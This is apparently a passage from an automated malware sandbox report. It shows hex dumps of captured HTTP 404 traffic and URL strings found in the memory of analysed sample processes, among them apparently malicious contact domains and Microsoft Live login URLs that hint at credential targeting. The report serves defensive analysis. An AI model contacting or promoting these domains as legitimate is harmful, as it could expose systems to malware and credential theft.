73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:37:12 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:37:14 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:37:17 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMT
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:37:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3tA0dKiHcngbjM4J%2FoOvKisUDigbobik1ANvMdR6N%2F0%2BGUqbO%2FQIXDXTZTLf1QhZkrUO9i%2FCAYOZk1VMfIL%2F%2B0QbntCQ%2FAd%2FOh71geHsj8EV08i22Cawp5Kfwc7EXzNJU0dmq1Yo5%2FpM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1f7fe04ff02c9c-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1111&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=718&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 53 4d 6f db 30 0c bd 1b d8 7f 60 1c 14 d8 80 08 b6 5b 17 18 6c d9 d8 b0 0f ec b4 ed d0 cb 8e 8a 4d c7 44 64 c9 93 e8 24 5d d1 ff 5e c8 6e ba 66 d3 41 12 29 f2 f1 f1 81 92 ab cf 3f 3e dd fd fa f9 05 7a 1e 74 1d c9 70 80 e7 7b 8d 55 dc 23 ed 7a 2e b2 34 bd 8a c3 13 aa b6 8e e4 80 ac c0 a8 01 ab f8 40 78 1c ad e3 18 1a 6b 18 0d 57 f1 91 5a ee ab 16 0f d4 a0 98 8d 0d 90 21 26 a5 85 6f 94 c6 2a db 80 ef 1d 99 bd 60 2b 3a e2 ca d8 18 92 3a 92 4c ac b1 86 3c cd e1 bb 65 f8 6a 27 d3 be 89 64 b2 f8 e5 4c aa fe 30 60 4b 0a de 8e 0e 3b 74 5e 34 56 5b 27 7c d3 e3 80 45 ab dc fe dd c3 d6 b6 f7 0f 5b d5 ec 77 2e 40 2c 21 c5 3a 4d d3 15 0d 81 ae 32 fc f8 28 93 05 50 26 cf 7d 85 b4 73 e7 4b 0a ac f3 3c 2f 61 50 6e 47 a6 48 cb ce 1a 2e c0 58 37 28 0d 59 3e 9e 92 eb 74 3c c1 47 47 4a 6f e0 1b ea 03 32 35 6a 03 5e 19 2f 3c 3a ea 4a 78 25 62 09 ff b1 82 75 d7 75 65 50 b7 a5 c3 3f ba ab 89 6d 09 03 19 71 81 11 d7 10 d6 eb 04 c6 13 0b a5 69 67 0a Data Ascii: 1edeSMo0`[lMDd$]^nfA)?>ztp{U#z.4@xkWZ!&o*`+::L<ej'dL0`K;t^4V['|E[w.@,!:M2(P&}sK</aPnGH.X7(Y>t<GGJo25j^/<:Jx%buueP?mqig
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:37:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rzt9uIbXS8%2BDuPqqeNXcUmct2f8cxML6dLJ2WpGJsvzry0gP%2Fuik%2BLbalOn2TzzxGK36pKPGR02D%2Brx6RXKEs5AnxfIXfbrOqhnGG38KExtAYkgExT87svrLNeHyzeNagjtxU2fHQJCO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1f7fedacf73aaf-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1073&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=738&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 53 4d 6f db 30 0c bd 1b d8 7f 60 1c 14 d8 80 08 b6 5b 17 18 6c d9 d8 b0 0f ec b4 ed d0 cb 8e 8a 4d c7 44 64 c9 93 e8 24 5d d1 ff 5e c8 6e ba 66 d3 41 12 29 f2 f1 f1 81 92 ab cf 3f 3e dd fd fa f9 05 7a 1e 74 1d c9 70 80 e7 7b 8d 55 dc 23 ed 7a 2e b2 34 bd 8a c3 13 aa b6 8e e4 80 ac c0 a8 01 ab f8 40 78 1c ad e3 18 1a 6b 18 0d 57 f1 91 5a ee ab 16 0f d4 a0 98 8d 0d 90 21 26 a5 85 6f 94 c6 2a db 80 ef 1d 99 bd 60 2b 3a e2 ca d8 18 92 3a 92 4c ac b1 86 3c cd e1 bb 65 f8 6a 27 d3 be 89 64 b2 f8 e5 4c aa fe 30 60 4b 0a de 8e 0e 3b 74 5e 34 56 5b 27 7c d3 e3 80 45 ab dc fe dd c3 d6 b6 f7 0f 5b d5 ec 77 2e 40 2c 21 c5 3a 4d d3 15 0d 81 ae 32 fc f8 28 93 05 50 26 cf 7d 85 b4 73 e7 4b 0a ac f3 3c 2f 61 50 6e 47 a6 48 cb ce 1a 2e c0 58 37 28 0d 59 3e 9e 92 eb 74 3c c1 47 47 4a 6f e0 1b ea 03 32 35 6a 03 5e 19 2f 3c 3a ea 4a 78 25 62 09 ff b1 82 75 d7 75 65 50 b7 a5 c3 3f ba ab 89 6d 09 03 19 71 81 11 d7 10 d6 eb 04 c6 13 0b a5 69 67 0a 68 d0 30 ba 12 66 ed 8b f7 69 3a Data Ascii: 1edeSMo0`[lMDd$]^nfA)?>ztp{U#z.4@xkWZ!&o*`+::L<ej'dL0`K;t^4V['|E[w.@,!:M2(P&}sK</aPnGH.X7(Y>t<GGJo25j^/<:Jx%buueP?mqigh0fi:
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:37:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pd2RvSQ%2FhDFu%2FxyV56mUce1wlGyxL1sc8xhrbRBLgYjS6RgigIGgfmd%2FV%2B2n8CHRVu9YAFir%2BAKaE5PxXhgFuiB%2BZ6%2FSwLrcmwhXm0xjj5Y2UDTxlvxUA%2Br2rJq6HWuQzjb0Bi82sjSR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1f7ffdfa6f6b58-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1247&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1755&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 66 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 65 53 4d 6f db 30 0c bd 1b d8 7f 60 1c 14 d8 80 08 b6 5b 17 18 6c d9 d8 b0 0f ec b4 ed d0 cb 8e 8a 4d c7 44 64 c9 93 e8 24 5d d1 ff 5e c8 6e ba 66 d3 41 12 29 f2 f1 f1 81 92 ab cf 3f 3e dd fd fa f9 05 7a 1e 74 1d c9 70 80 e7 7b 8d 55 dc 23 ed 7a 2e b2 34 bd 8a c3 13 aa b6 8e e4 80 ac c0 a8 01 ab f8 40 78 1c ad e3 18 1a 6b 18 0d 57 f1 91 5a ee ab 16 0f d4 a0 98 8d 0d 90 21 26 a5 85 6f 94 c6 2a db 80 ef 1d 99 bd 60 2b 3a e2 ca d8 18 92 3a 92 4c ac b1 86 3c cd e1 bb 65 f8 6a 27 d3 be 89 64 b2 f8 e5 4c aa fe 30 60 4b 0a de 8e 0e 3b 74 5e 34 56 5b 27 7c d3 e3 80 45 ab dc fe dd c3 d6 b6 f7 0f 5b d5 ec 77 2e 40 2c 21 c5 3a 4d d3 15 0d 81 ae 32 fc f8 28 93 05 50 26 cf 7d 85 b4 73 e7 4b 0a ac f3 3c 2f 61 50 6e 47 a6 48 cb ce 1a 2e c0 58 37 28 0d 59 3e 9e 92 eb 74 3c c1 47 47 4a 6f e0 1b ea 03 32 35 6a 03 5e 19 2f 3c 3a ea 4a 78 25 62 09 ff b1 82 75 d7 75 65 50 b7 a5 c3 3f ba ab 89 6d 09 03 19 71 81 11 d7 10 d6 eb 04 c6 13 0b a5 Data Ascii: 1f2eSMo0`[lMDd$]^nfA)?>ztp{U#z.4@xkWZ!&o*`+::L<ej'dL0`K;t^4V['|E[w.@,!:M2(P&}sK</aPnGH.X7(Y>t<GGJo25j^/<:Jx%buueP?mq
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:37:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eRAqe8CMFAAfoRpV%2BtW7L08y28JxosKx912g6j7MoFd5RGvZjFn%2BWNnhsz8WuMj5cA2aHzxMnXuYW9ypP99eA9IffOskZC%2F%2BnWtucv5tsYXriXVs1P9gF0XexJVuH6wcWgKQhP5Wq3kN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1f800ea877eb12-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1234&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=447&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 Data Ascii: 31c<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; heigh
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
    Source: Item-RQF-9456786.exe, 00000000.00000002.2271370211.0000000002A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000003904000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://shkip2dom.com/
    Source: LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000003DBA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/p31e/?2J=L
    Source: LiiDBuNLRIYu.exe, 0000000B.00000002.4743693637.0000000004D2A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rtpwslot888gol.sbs
    Source: LiiDBuNLRIYu.exe, 0000000B.00000002.4743693637.0000000004D2A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rtpwslot888gol.sbs/7arg/
    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005FFC000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000032BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: fontview.exe, 0000000A.00000002.4743802201.00000000067D6000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000003A96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
    Source: fontview.exe, 0000000A.00000002.4743802201.00000000067D6000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000003A96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ik.imgkit.net/u1sv5cu4wfj/cribflyer-photos/tr:w-2000
    Source: fontview.exe, 0000000A.00000002.4740849571.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
    Source: fontview.exe, 0000000A.00000002.4740849571.00000000032E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
    Source: fontview.exe, 0000000A.00000002.4740849571.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
    Source: fontview.exe, 0000000A.00000002.4740849571.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
    Source: fontview.exe, 0000000A.00000002.4740849571.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033%
    Source: fontview.exe, 0000000A.00000002.4740849571.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
    Source: fontview.exe, 0000000A.00000002.4740849571.00000000032E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
    Source: fontview.exe, 0000000A.00000003.2743526885.0000000007FC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
